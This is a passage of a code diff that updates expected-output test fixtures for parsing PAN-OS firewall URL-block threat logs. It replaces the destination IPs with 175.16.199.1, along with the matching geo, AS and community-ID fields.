"192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6259,7 +6330,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:kCzU3MoZUMh7VlhTewngoP1twbw=" + "community_id": "1:vEVgzoaf3bFxNSHxElyZGdPv0tk=" } }, "threat_category": "unknown", @@ -6304,8 +6375,8 @@ ], "network": { "community_id": [ - "1:J9ymoylt3wkbcwWFUbTc1FK8W6k=", - "1:kCzU3MoZUMh7VlhTewngoP1twbw=" + "1:vx6QhA66UfS/uMptkCPXbSs/VIc=", + "1:vEVgzoaf3bFxNSHxElyZGdPv0tk=" ], "transport": "tcp", "application": "ssl", @@ -6344,14 +6415,14 @@ ], "ip": [ "192.168.15.224", - "54.192.7.152", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768109425Z", - "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691864900Z", + "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:54.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6374,29 +6445,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6412,14 +6482,14 @@ "port": 53093, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6434,7 +6504,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:fj3W3hxHPqT4snZlcRibDiqLNvs=" + "community_id": "1:0OZauWAwEciMS/9irO/mxKpEVd0=" } }, "threat_category": "unknown", @@ -6479,8 +6549,8 @@ ], "network": { "community_id": [ - "1:DDpR8PTbIvvnd+7Hcre+jZQVtaY=", - "1:fj3W3hxHPqT4snZlcRibDiqLNvs=" + "1:TOolTBDfCoqemaWK2qQluUYjXNE=", + "1:0OZauWAwEciMS/9irO/mxKpEVd0=" ], "transport": "tcp", "application": "ssl", @@ -6519,14 +6589,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768113669Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691871300Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6549,29 +6619,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6587,14 +6656,14 @@ "port": 53094, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6609,7 +6678,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:HLMiinoD9jzLzaYU394wqKksBUE=" + "community_id": "1:aNs8G57tIhcmdkGe7UOW3/6liUc=" } }, "threat_category": "unknown", @@ -6654,8 +6723,8 @@ ], "network": { "community_id": [ - "1:1dccHKUcnMkeYh68uGS1Jhl6+Hk=", - "1:HLMiinoD9jzLzaYU394wqKksBUE=" + "1:i8meAqHKtkJqKE+9I5xppo1GRCQ=", + "1:aNs8G57tIhcmdkGe7UOW3/6liUc=" ], "transport": "tcp", "application": "ssl", @@ -6694,14 +6763,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768117683Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691877600Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6724,29 +6793,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6762,14 +6830,14 @@ "port": 53095, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6784,7 +6852,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:pNMLPgDpZv2+S840jW/Ggq8ng2I=" + "community_id": "1:QRwP1E+IZQNepZx937GDIP0ogg8=" } }, "threat_category": "unknown", @@ -6829,8 +6897,8 @@ ], "network": { "community_id": [ - "1:URFNGbFKOwT3Iaugo33D1mB/ndw=", - "1:pNMLPgDpZv2+S840jW/Ggq8ng2I=" + "1:YeyPRcMlDZkftNtQRcTv91rAex4=", + "1:QRwP1E+IZQNepZx937GDIP0ogg8=" ], "transport": "tcp", "application": "ssl", @@ -6869,14 +6937,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768121559Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691883900Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6899,29 +6967,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6937,14 +7004,14 @@ "port": 53096, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6959,7 +7026,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:l6AkSmB92aDAHpLhiSCR28J+ANI=" + "community_id": "1:xgJ/pNC9QdddGZU7CHgNbvJZaxs=" } }, "threat_category": "unknown", @@ -7004,8 +7071,8 @@ ], "network": { "community_id": [ - "1:/KMTfFetIlydTraxch89t5PYve0=", - "1:l6AkSmB92aDAHpLhiSCR28J+ANI=" + "1:bZsuzLGfi0LYswmLphwUFWuQd1w=", + "1:xgJ/pNC9QdddGZU7CHgNbvJZaxs=" ], "transport": "tcp", "application": "ssl", @@ -7044,14 +7111,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768142568Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691888200Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7074,29 +7141,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7112,14 +7178,14 @@ "port": 53097, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -7134,7 +7200,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:33ah/rOB1xL3Yy0FUH0sEGuRvx8=" + "community_id": "1:IO/IfwpXRNzULdZcWB329gUsmOw=" } }, "threat_category": "unknown", @@ -7179,8 +7245,8 @@ ], "network": { "community_id": [ - "1:Z8gFtZEJJ5xho2+kyaSyoXp1O/I=", - "1:33ah/rOB1xL3Yy0FUH0sEGuRvx8=" + "1:w6xclyF2pQGez58w0M8x52894Q4=", + "1:IO/IfwpXRNzULdZcWB329gUsmOw=" ], "transport": "tcp", "application": "ssl", @@ -7219,14 +7285,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768147659Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691893300Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7249,29 +7315,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7287,14 +7352,14 @@ "port": 53099, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -7309,7 +7374,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:zOzoB9ZSg+/QZ7bt4sM6/I2TOXc=" + "community_id": "1:tHHvq2Jp4stMPZG5A+v5ZHY0TiU=" } }, "threat_category": "unknown", @@ -7354,8 +7419,8 @@ ], "network": { "community_id": [ - "1:dS0Vb9L/suztc58TuCJc5kLrnd4=", - "1:zOzoB9ZSg+/QZ7bt4sM6/I2TOXc=" + "1:ZkDeoTepE92XWecwZ9ysJEiL3uY=", + "1:tHHvq2Jp4stMPZG5A+v5ZHY0TiU=" ], "transport": "tcp", "application": "ssl", @@ -7394,14 +7459,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768151614Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691898900Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", 
